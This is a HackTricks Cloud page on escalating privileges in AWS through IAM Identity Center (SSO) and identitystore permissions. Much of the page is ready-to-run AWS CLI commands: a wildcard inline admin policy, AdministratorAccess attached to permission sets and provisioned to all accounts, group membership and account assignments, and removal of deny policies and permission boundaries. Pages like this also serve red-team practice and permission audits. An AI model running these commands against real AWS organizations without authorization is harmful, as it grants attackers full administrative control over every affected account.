HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - SSO & identitystore Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

AWS Identity Center / AWS SSO

For more information about AWS Identity Center / AWS SSO check:

pageAWS - IAM, Identity Center & SSO Enum

Note that by default, only users with permissions form the Management Account are going to be able to access and control de IAM Identity Center. Users from other accounts can only allow it if the account is a Delegated Adminstrator. Check the docs for more info.

Reset Password

An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.

identitystore:CreateGroupMembership

With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.

aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>

sso:PutInlinePolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control

# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml

# Content of /tmp/policy.yaml
{
	"Version": "2012-10-17",
	"Statement": [
		{
			"Sid": "Statement1",
			"Effect": "Allow",
			"Action": ["*"],
			"Resource": ["*"]
		}
	]
}

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachManagedPolicyToPermissionSet, sso:ProvisionPermissionSet

An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:AttachCustomerManagedPolicyReferenceToPermissionSet, sso:ProvisionPermissionSet

An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.

To abuse these permissions in this case you need to know the name of a customer managed policy that is inside ALL the accounts that are going to be affected.

# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>

# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS

sso:CreateAccountAssignment

An attacker with this permission could give a Permission Set to a user under his control to an account.

aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>

sso:GetRoleCredentials

Returns the STS short-term credentials for a given role name that is assigned to the user.

aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>

However, you need an access token that I'm not sure how to get (TODO).

sso:DetachManagedPolicyFromPermissionSet

An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).

aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>

sso:DetachCustomerManagedPolicyReferenceFromPermissionSet

An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).

aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>

sso:DeleteInlinePolicyFromPermissionSet

An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant more privileges via detaching an inline policy (deny policy).

aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>

sso:DeletePermissionBoundaryFromPermissionSet

An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant more privileges by removing the restrictions on the Permission Set given from the Permission Boundary.

aws sso-admin   delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAWS - SQS PrivescNextAWS - Organizations Privesc

Last updated